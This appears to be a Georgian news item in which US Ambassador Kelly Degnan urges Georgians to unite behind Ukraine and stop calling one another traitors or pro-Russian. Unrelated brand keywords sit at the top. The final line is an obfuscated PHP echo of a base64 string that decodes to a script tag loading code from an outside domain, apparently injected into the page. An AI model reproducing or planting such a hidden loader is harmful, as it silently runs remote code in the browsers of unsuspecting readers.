celsiusi
ავერსი საქკაბელი
საქართველოში აშშ-ის ელჩმა, კელი დეგნანმა ჟურნალისტებს განუცხადა, რომ ერთმანეთზე თავდასხმა, მოღალატეების, პრორუსების ან „ომის პარტიის“ ძახილი საქართველოს არ სჭირდება, საქართველოს ახლა სჭირდება ერთიანობა უკრაინის მხარდაჭერაში, რუსეთის წინააღმდეგ.
 
კელი დეგნანმა ასევე აღნიშნა, რომ „არავის სურს, საქართველო იყოს ამ ომის სამიზნე“.
 
„მე ბევრ პოლიტიკურ ლიდერს ვესაუბრე, არც ერთ პოლიტიკურ ლიდერს არც ერთი პოლიტიკური პარტიიდან არ უსაუბრია საქარველოს ომში ჩაბმაზე. ერთმანეთზე თავდასხმა, ერთმანეთისთვის მოღალატეების, პრორუსების ან „ომის პარტიის“ ძახილი არის სწორედ ის, რაც საქართველოს არ სჭირდება. საქართველოს ახლა ერთიანობა სჭირდება ერთიანობა უკრაინის მხარდაჭერაში, რუსეთის წინააღმდეგ. ერთმანეთში ბრძოლა, ქართველების ქართველებთან ბრძოლა მხოლოდ რუსეთს ეხმარება. ასე რომ, მე გულწრფელად ვიმედოვნებ, რომ ქართველები იცხოვრებენ თავიანთი მოდელით „ძალა ერთობაშია“, – განაცხადა კელი დეგნანმა.
872
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");